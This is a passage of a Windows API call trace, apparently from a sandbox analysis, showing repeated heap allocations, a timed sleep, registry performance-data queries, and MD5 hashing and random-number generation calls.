out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.111] GetProcessHeap () returned 0xe30000 [0080.111] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.112] GetProcessHeap () returned 0xe30000 [0080.112] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.112] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.113] GetProcessHeap () returned 0xe30000 [0080.113] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0080.113] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0080.114] GetProcessHeap () returned 0xe30000 [0080.114] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.114] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0080.115] GetProcessHeap () returned 0xe30000 [0080.115] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0080.115] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dfd8 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0080.116] GetProcessHeap () returned 0xe30000 [0080.116] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0080.117] GetProcessHeap () returned 0xe30000 [0080.117] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0080.118] GetProcessHeap () returned 0xe30000 [0080.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3680 | out: hHeap=0xe30000) returned 1 [0080.118] GetProcessHeap () returned 0xe30000 [0080.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0080.118] GetProcessHeap () returned 0xe30000 [0080.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0080.118] GetProcessHeap () returned 0xe30000 [0080.118] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeca148 | out: hHeap=0xe30000) returned 1 [0080.118] Sleep (dwMilliseconds=0xea60) [0090.170] GetTickCount () returned 0x117c779 [0090.170] GetProcessHeap () returned 0xe30000 [0090.170] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x2080) returned 0xecab68 [0090.170] RegQueryValueExA (in: hKey=0x80000004, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0xecab68, lpcbData=0x2dee40c*=0x2000 | out: lpType=0x0, lpData=0xecab68*=0x50, lpcbData=0x2dee40c*=0x3d8) returned 0x0 [0090.176] GetProcessHeap () returned 0xe30000 [0090.176] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xecab68 | out: hHeap=0xe30000) returned 1 [0090.176] GetTickCount () returned 0x117c789 [0090.176] GetSystemTimes (in: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4 | out: lpIdleTime=0x859da4, lpKernelTime=0x859dac, lpUserTime=0x859db4) returned 1 [0090.176] GetCurrentProcess () returned 0xffffffff [0090.176] GetProcessTimes (in: hProcess=0xffffffff, lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4 | out: lpCreationTime=0x859dbc, lpExitTime=0x859dc4, lpKernelTime=0x859dcc, lpUserTime=0x859dd4) returned 1 [0090.176] CryptAcquireContextA (in: phProv=0x2dee408, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee408*=0xed4800) returned 1 [0090.179] CryptCreateHash (in: hProv=0xed4800, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2dee40c | out: phHash=0x2dee40c) returned 1 [0090.179] CryptHashData (hHash=0xec20b0, pbData=0x859c10, dwDataLen=0x1cc, dwFlags=0x0) returned 1 [0090.179] CryptGetHashParam (in: hHash=0xec20b0, dwParam=0x4, pbData=0x2dee404, pdwDataLen=0x2dee400, dwFlags=0x0 | out: pbData=0x2dee404, pdwDataLen=0x2dee400) returned 1 [0090.179] CryptGetHashParam (in: hHash=0xec20b0, dwParam=0x2, pbData=0x2dee428, pdwDataLen=0x2dee404, dwFlags=0x0 | out: pbData=0x2dee428, pdwDataLen=0x2dee404) returned 1 [0090.179] CryptDestroyHash (hHash=0xec20b0) returned 1 [0090.179] CryptReleaseContext (hProv=0xed4800, dwFlags=0x0) returned 1 [0090.179] GetProcessHeap () returned 0xe30000 [0090.179] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x184) returned 0xed4530 [0090.179] wnsprintfA (in: pszDest=0xed4530, cchDest=4, pszFmt="%02x" | out: pszDest="ae") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4532, cchDest=4, pszFmt="%02x" | out: pszDest="1d") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4534, cchDest=4, pszFmt="%02x" | out: pszDest="c5") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4536, cchDest=4, pszFmt="%02x" | out: pszDest="e6") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4538, cchDest=4, pszFmt="%02x" | out: pszDest="eb") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed453a, cchDest=4, pszFmt="%02x" | out: pszDest="1e") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed453c, cchDest=4, pszFmt="%02x" | out: pszDest="02") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed453e, cchDest=4, pszFmt="%02x" | out: pszDest="82") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4540, cchDest=4, pszFmt="%02x" | out: pszDest="9c") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4542, cchDest=4, pszFmt="%02x" | out: pszDest="02") returned 2 [0090.179] wnsprintfA (in: pszDest=0xed4544, cchDest=4, pszFmt="%02x" | out: pszDest="58") returned 2 [0090.180] wnsprintfA (in: pszDest=0xed4546, cchDest=4, pszFmt="%02x" | out: pszDest="46") returned 2 [0090.180] wnsprintfA (in: pszDest=0xed4548, cchDest=4, pszFmt="%02x" | out: pszDest="f3") returned 2 [0090.180] wnsprintfA (in: pszDest=0xed454a, cchDest=4, pszFmt="%02x" | out: pszDest="de") returned 2 [0090.180] wnsprintfA (in: pszDest=0xed454c, cchDest=4, pszFmt="%02x" | out: pszDest="f5") returned 2 [0090.180] wnsprintfA (in: pszDest=0xed454e, cchDest=4, pszFmt="%02x" | out: pszDest="df") returned 2 [0090.180] CryptAcquireContextW (in: phProv=0x2dee18c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2dee18c*=0xed4d50) returned 1 [0090.181] CryptGenRandom (in: hProv=0xed4d50, dwLen=0x80, pbBuffer=0x2dee1a0 | out: pbBuffer=0x2dee1a0) returned 1 [0090.181] CryptReleaseContext (hProv=0xed4d50, dwFlags=0x0) returned 1 [0090.181] GetProcessHeap () returned 0xe30000 [0090.181] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xe55bd0 [0090.181] GetProcessHeap () returned 0xe30000 [0090.181] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9dd08 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xed3e88 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xec7a58 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed3e88 | out: hHeap=0xe30000) returned 1 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xed3e88 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x488) returned 0xec7ce8 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x84) returned 0xe9d918 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xedbc50 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xedc0e0 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x280) returned 0xec8178 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x48c) returned 0xedc570 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dfd8 [0090.182] GetProcessHeap () returned 0xe30000 [0090.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x8c) returned 0xe9f260 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x284) returned 0xedca08 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec8178 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x484) returned 0xecab68 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xedca08 | out: hHeap=0xe30000) returned 1 [0090.183] GetProcessHeap () returned 0xe30000 [0090.183] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0090.183] 